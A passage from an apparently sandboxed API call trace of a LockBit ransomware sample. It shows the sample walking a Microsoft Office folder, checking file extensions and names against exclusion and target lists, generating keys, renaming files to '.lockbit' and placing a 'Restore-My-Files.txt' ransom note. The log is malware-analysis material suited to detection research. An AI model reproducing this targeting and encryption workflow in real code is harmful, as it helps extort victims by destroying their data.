lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.367] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.367] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300912.WMF.lockbit") returned 70 [0199.367] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300912.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0300912.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.373] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.373] malloc (_Size=0x40068) returned 0x3d70450 [0199.373] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=56060) returned 1 [0199.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.374] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300912.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300912.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.377] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.377] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.379] free (_Block=0x1fa2ed8) [0199.379] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300912.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.379] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.379] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.379] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb340b00, ftCreationTime.dwHighDateTime=0x1bf452d, ftLastAccessTime.dwLowDateTime=0xbd68fd60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfb340b00, ftLastWriteTime.dwHighDateTime=0x1bf452d, nFileSizeHigh=0x0, nFileSizeLow=0x2fd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0301050.WMF", cAlternateFileName="")) returned 1 [0199.379] lstrcmpiW (lpString1=".", lpString2="J0301050.WMF") returned -1 [0199.379] lstrcmpiW (lpString1="..", lpString2="J0301050.WMF") returned -1 [0199.379] PathFindExtensionW (pszPath="J0301050.WMF") returned=".WMF" [0199.379] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.379] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.379] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.379] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.379] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.380] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.381] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.381] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0301050.WMF") returned 1 [0199.382] lstrcmpiW (lpString1="ntldr", lpString2="J0301050.WMF") returned 1 [0199.382] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0301050.WMF") returned 1 [0199.382] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0301050.WMF") returned -1 [0199.382] lstrcmpiW (lpString1="autorun.inf", lpString2="J0301050.WMF") returned -1 [0199.382] lstrcmpiW (lpString1="thumbs.db", lpString2="J0301050.WMF") returned 1 [0199.382] lstrcmpiW (lpString1="iconcache.db", lpString2="J0301050.WMF") returned -1 [0199.382] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.382] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301050.WMF") returned=".WMF" [0199.382] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.382] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.382] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.383] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.383] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301050.WMF.lockbit") returned 70 [0199.383] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301050.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0301050.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0199.385] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.385] malloc (_Size=0x40068) returned 0x3f70048 [0199.385] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=12248) returned 1 [0199.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0199.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0199.386] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0199.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301050.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301050.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.392] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.392] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.394] free (_Block=0x1fa2ed8) [0199.394] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301050.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.394] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.394] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf780800, ftCreationTime.dwHighDateTime=0x1bf452e, ftLastAccessTime.dwLowDateTime=0xbd68fd60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf780800, ftLastWriteTime.dwHighDateTime=0x1bf452e, nFileSizeHigh=0x0, nFileSizeLow=0x224e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0301076.WMF", cAlternateFileName="")) returned 1 [0199.394] lstrcmpiW (lpString1=".", lpString2="J0301076.WMF") returned -1 [0199.394] lstrcmpiW (lpString1="..", lpString2="J0301076.WMF") returned -1 [0199.394] PathFindExtensionW (pszPath="J0301076.WMF") returned=".WMF" [0199.394] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.394] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.394] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.394] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.395] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.396] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.396] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0301076.WMF") returned 1 [0199.397] lstrcmpiW (lpString1="ntldr", lpString2="J0301076.WMF") returned 1 [0199.397] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0301076.WMF") returned 1 [0199.397] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0301076.WMF") returned -1 [0199.397] lstrcmpiW (lpString1="autorun.inf", lpString2="J0301076.WMF") returned -1 [0199.397] lstrcmpiW (lpString1="thumbs.db", lpString2="J0301076.WMF") returned 1 [0199.397] lstrcmpiW (lpString1="iconcache.db", lpString2="J0301076.WMF") returned -1 [0199.397] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.397] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301076.WMF") returned=".WMF" [0199.397] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.397] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.397] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.398] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.399] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.399] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.399] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301076.WMF.lockbit") returned 70 [0199.399] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301076.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0301076.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0199.400] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.400] malloc (_Size=0x40068) returned 0x3e70008 [0199.400] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8782) returned 1 [0199.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0199.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0199.401] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0199.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301076.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301076.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.405] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.405] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.407] free (_Block=0x1fa2ed8) [0199.407] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301076.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.407] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.407] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.407] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf91e7c00, ftCreationTime.dwHighDateTime=0x1bf452e, ftLastAccessTime.dwLowDateTime=0xbd68fd60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf91e7c00, ftLastWriteTime.dwHighDateTime=0x1bf452e, nFileSizeHigh=0x0, nFileSizeLow=0x953a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0301252.WMF", cAlternateFileName="")) returned 1 [0199.407] lstrcmpiW (lpString1=".", lpString2="J0301252.WMF") returned -1 [0199.407] lstrcmpiW (lpString1="..", lpString2="J0301252.WMF") returned -1 [0199.407] PathFindExtensionW (pszPath="J0301252.WMF") returned=".WMF" [0199.407] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.407] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.408] 